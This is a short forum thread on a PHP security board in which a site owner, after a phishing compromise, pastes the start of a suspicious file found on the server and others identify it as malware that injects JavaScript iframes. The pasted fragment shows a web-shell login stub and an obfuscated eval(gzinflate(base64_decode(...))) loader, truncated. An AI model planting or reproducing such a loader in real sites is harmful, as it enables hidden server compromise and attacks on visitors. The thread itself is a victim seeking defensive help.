Security issues related to php and mysql usage. How to make your code secure? Security measures and configurations? It's all in here!
Moderators: macek, egami, gesf
by brm » Thu Nov 04, 2010 10:14 pm
09_50_56_a.php Found this in my website file manager.
I don't regonise it. When I veiw the code I get this....
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs....................................
It goes on forever.
The site was hacked by Phishing scheme types which led me to find the above amongst lots of others.
Don't want to delete it until I am sure it is not required.....Seems very sus to me.....
Thanks Ben.
-
brm
- New php-forum User
-
- Posts: 1
- Joined: Thu Nov 04, 2010 10:07 pm
by egami » Fri Nov 05, 2010 4:08 am
Looks fishy to me.
-
egami
- php-forum GURU
-
- Posts: 2197
- Joined: Wed Oct 06, 2010 11:19 am
- Location: Happy Valley, UT
by Adroitly » Sat Nov 13, 2010 12:17 am
Bit random...decode it!
-
Adroitly
- New php-forum User
-
- Posts: 19
- Joined: Fri Nov 12, 2010 8:23 pm
by Suhoij » Thu Jun 16, 2011 6:01 am
This is the virus. It's generate javascript iframe. You can look at the code - write echo instead of eval.
-
Suhoij
- New php-forum User
-
- Posts: 92
- Joined: Tue Aug 17, 2010 2:00 am
- Location: Ukraine Kharkov
-
Return to PHP & MySQL Security
Who is online
Users browsing this forum: No registered users and 1 guest
